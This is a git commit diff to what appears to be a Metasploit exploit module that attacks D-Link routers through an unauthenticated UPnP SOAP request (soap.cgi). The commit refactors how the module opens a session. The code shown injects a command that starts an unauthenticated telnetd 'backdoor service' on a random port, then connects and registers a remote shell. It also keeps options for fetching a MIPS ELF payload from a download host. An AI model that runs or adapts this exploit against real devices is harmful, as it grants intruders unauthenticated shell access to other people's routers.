session stuff

m-1-k-3 · m-1-k-3 · commit 393c1b2a99b0 · 2013-07-15T07:57:30.000+02:00
diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -80,16 +80,14 @@ def initialize(info = {})
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-				#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
-				#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
 			], self.class)
 	end
 
 
 	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
 		uri = '/soap.cgi'
-		data_uri = "?service=WANIPConn1"
+		#data_uri = "?service=WANIPConn1"
 
 		data_cmd = "<?xml version=\"1.0\"?>"
 		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
@@ -170,15 +168,10 @@ def exploit
 		end
 
 		if target.name =~ /Telnet/
-			#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
-			#user = datastore['TELNETUSER'] || rand_text_alpha(4)
 			telnetport = rand(65535)
 
-			#vprint_status("#{rhost}:#{rport} - User: #{user}")
-			#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
-			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			cmd = "telnetd -p #{telnetport}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
@@ -197,16 +190,16 @@ def exploit
 				if sock
 					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
 				else
-					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+					fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
 				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
 				auth_info = {
 					:host   => rhost,
 					:port   => telnetport,
 					:sname => 'telnet',
-					#:user   => user,
-					#:pass	=> passw,
+					:user   => "",
+					:pass	=> "",
 					:source_type => "exploit",
 					:active => true
 				}
@@ -215,28 +208,12 @@ def exploit
 					'USERPASS_FILE' => nil,
 					'USER_FILE'     => nil,
 					'PASS_FILE'     => nil,
-					#'USERNAME'      => user,
-					#'PASSWORD'      => passw
+					'USERNAME'      => nil,
+					'PASSWORD'      => nil
 				}
-				#taken from ./lib/msf/core/auxiliary/commandshell.rb
-				info = "TELNET (#{rhost}:#{telnetport})"
-				sess = Msf::Sessions::CommandShell.new(sock)
-				sess.set_from_exploit(self)
-				sess.info = info
-
-				# Clean up the stored data
-				sess.exploit_datastore.merge!(merge_me)
-
-				# Prevent the socket from being closed
-				self.sockets.delete(sock)
-				self.sock = nil if self.respond_to? :sock
-
-				framework.sessions.register(sess)
-				sess.process_autoruns(datastore)
-
-				sess
+				start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
 			rescue
-				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
 			return
 		end
